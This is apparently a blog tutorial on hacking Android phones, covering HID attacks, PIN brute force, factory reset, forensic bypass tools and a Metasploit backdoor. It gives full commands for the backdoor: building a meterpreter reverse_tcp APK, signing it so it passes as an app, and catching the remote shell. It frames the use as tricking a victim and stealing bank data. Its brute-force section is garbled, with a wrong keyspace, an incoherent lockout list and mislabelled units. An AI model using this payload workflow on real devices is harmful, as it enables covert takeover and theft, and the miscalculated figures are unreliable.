How to Hack Whatsapp Account With Phone Number Only

How to Hack Android Phones


Morpheuslord

I am an ethical hacker who learned hacking from YouTube. I like to help people with the learning of necessary skills.

The methods used by attackers to exploit Android phones are increasing. People are busy finding new vulnerabilities to exploit. Below are a few ways to hack Android phones:

  • HID (Human Interface Device) Attack
  • Password BruteForce
  • Payloads (Custom hacking scripts)
  • Factory Reset
  • Bypass

HID

The HID attack is a scenario in which an attacker takes a programmable embedded development platform with an associated software package such as SET (Social Engineering Toolkit) or Metasploit, or uses other phones and USB devices programmed to act as a RubberDucky, and executes an attack.


In such an attack, the hacker installs a backdoor, and by using that, he completely downloads the target's information.

Using the information, he can either hack into the bank account of the person or even sell the information on the dark web.

You can see how a HID attack is conducted on the android infosec channel.

Login Bruteforce

A brute-force attack uses the trial and error method to guess the correct password of the phone.


Some important points to consider to conduct such an attack:

  • Number of passwords
  • The timeout
  • The time it might take

The timeout:

    After 5 wrong PINs - 30 sec delay
    After 1 wrong PIN - 30 sec delay
    After 41 wrong PINs - 30 sec delay

The number of passwords:

The possible combinations for a 4-digit numeric lock run from four zeros to four nines, that is 0000-9999, so we have about:

    4^10 passwords, or 1048576 passwords in total

Time consumed:

Let's see some possibilities for our understanding:

Possibility # 1: 5 passwords wrong, a delay of 30 seconds. We need to find out how many times we get the delay in the first place and find the total time consumed.

    total delays: 1048576 / 5 = 209715.2 times
    total time: 209715.2 * 30 = 6291456 sec or 1747.6266 hours

Possibility # 2: 41 passwords wrong, delay 30 sec.

    total delays: 1048576 / 41 = 25,575.0243 delays
    total time consumed: 25575.0243 * 30 = 7,67,250.729 sec or 767250.729 / 60 = 12,787.5121 min or 12,787.51215 hours

You can see it is almost impossible to find the person's phone's password by brute-forcing. You will be dead by the time you find the phone's password 😣.
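
An added example, not code from the original article: the delay arithmetic above as a small Python model, extended to other PIN lengths and to a delay that doubles after each lockout. It counts an n-digit numeric PIN as 10^n candidates (0000-9999 is 10,000) and serves no delay after the final guess; the function names and the doubling policy with a one-hour cap are assumptions made for illustration.

```python
# Added example: worst-case guessing time under a PIN lockout policy.
# All names here are illustrative; none come from the article.

def pin_keyspace(digits: int) -> int:
    """An n-digit numeric PIN has 10 choices per position."""
    return 10 ** digits


def lockouts_before_last_guess(keyspace: int, attempts_per_lockout: int) -> int:
    """Lockouts served while trying every candidate; none follows the last."""
    if keyspace < 1 or attempts_per_lockout < 1:
        raise ValueError("keyspace and attempts_per_lockout must be >= 1")
    return (keyspace - 1) // attempts_per_lockout


def flat_worst_case_seconds(keyspace, attempts_per_lockout, delay_s):
    """Fixed delay after every batch of wrong guesses (the article's model)."""
    return lockouts_before_last_guess(keyspace, attempts_per_lockout) * delay_s


def escalating_worst_case_seconds(keyspace, attempts_per_lockout,
                                  base_delay_s, cap_s):
    """Delay doubles after each lockout until it reaches cap_s."""
    remaining = lockouts_before_last_guess(keyspace, attempts_per_lockout)
    total, delay = 0, base_delay_s
    while remaining and delay < cap_s:
        total += delay
        delay = min(delay * 2, cap_s)
        remaining -= 1
    return total + remaining * cap_s


def policy_table(digit_lengths=(4, 6, 8)):
    """(digits, candidates, flat hours, escalating hours) per PIN length."""
    rows = []
    for digits in digit_lengths:
        n = pin_keyspace(digits)
        rows.append((digits, n,
                     flat_worst_case_seconds(n, 5, 30) / 3600,
                     escalating_worst_case_seconds(n, 5, 30, 3600) / 3600))
    return rows


if __name__ == "__main__":
    for digits, n, flat_h, esc_h in policy_table():
        print(f"{digits}-digit PIN: {n:>11,} candidates | "
              f"flat 30 s: {flat_h:>9.1f} h | doubling, 1 h cap: {esc_h:>11.1f} h")
```

With the article's figure of 1048576 candidates, `flat_worst_case_seconds(1048576, 5, 30)` returns 6291450 seconds, one partial lockout short of the 6291456 sec computed above.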

Payloads

Payloads are simple scripts that help a hacker hack a system. If I trick the person into authorizing and installing the .apk file, it opens a back door that connects back to Meterpreter, which listens for the connection and gets the system under its control.

Meterpreter reverse TCP payload creation command:

    msfvenom -p android/meterpreter/reverse_tcp LHOST=Localhost IP LPORT=LocalPort R > android_shell.apk

Here -p selects the payload, LHOST is the local host IP that receives the back connection (check yours with the ifconfig command), LPORT is the local port that listens for the connection from the victim (we set it to 4444), and R means raw format (we select .apk).

We need to sign the .apk file with a certificate to give it an identity and have it recognized as an application. Without this, the .apk file will be recognized as a virus.

To assign a cert, you must follow these steps:

Install:

  • Keytool
  • Jar signer
  • Zipalign

Sign the .apk file locally:

    keytool -genkey -V -keystore key.keystore -alias hacked -keyalg RSA -keysize 2048 -validity 10000

Keytool making Keystore:

    jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore android_shell.apk hacked

Signing a .apk file with JARsigner:

    jarsigner -verify -verbose -certs android_shell.apk

Install and use Zipalign:

    sudo apt-get install zipalign
    or
    sudo apt install zipalign

    zipalign -v 4 android_shell.apk singed_jar.apk

Now run this command in the Metasploit console:

    use exploit/multi/handler

Then set the various parameters in Metasploit, such as lhost and lport. After setting the host and port, type:

    run (and press enter)

After you execute this code, you will receive a connection to the target system. Using this, you can access the whole system and gain full access.

Factory Reset


A flashed phone is a device where a different ROM/operating system has been flashed on top of the system that came with the phone. Often, phones can be flashed to appear unlocked, whereas, in reality, they are still carrier-branded phones that will not be compatible with our service.

For every phone, there are different methods for factory reset; the most common is to do it via the volume buttons and the power button. For example, I have an old Oppo phone for which the factory reset combination is the volume-down button and the power button held for 5 seconds, and the phone is flashed.

Bypass

Bypass is a method commonly used by law enforcement such as the CIA and FBI; in India, the IB and RAW use a special device, as shown in the picture.

image

This kind of attack depends mainly on the attacker using the IP_BOX, which works mainly by brute-forcing the target. It is mainly used by law enforcement to get into the phones of terrorists, cybercriminals and other criminals.

You can use another tool known as the BashBunny from Hak5. This is a mini-computer from which you can conduct a login brute-force attack. Unlike the other options above, this is a serious beast in its work. In a matter of hours, you can crack the most difficult of difficult passwords with ease.

Note

This tutorial is for educational purposes only. Don't try this and get into trouble.

Sources

  • rapid7 (referred to for Metasploit information and docs)
  • android infosec (learn about the HID attack)
  • David Bombal (learn about the Bash Bunny)


Source: https://hackernoon.com/hacking-android-phones-bdk32ze
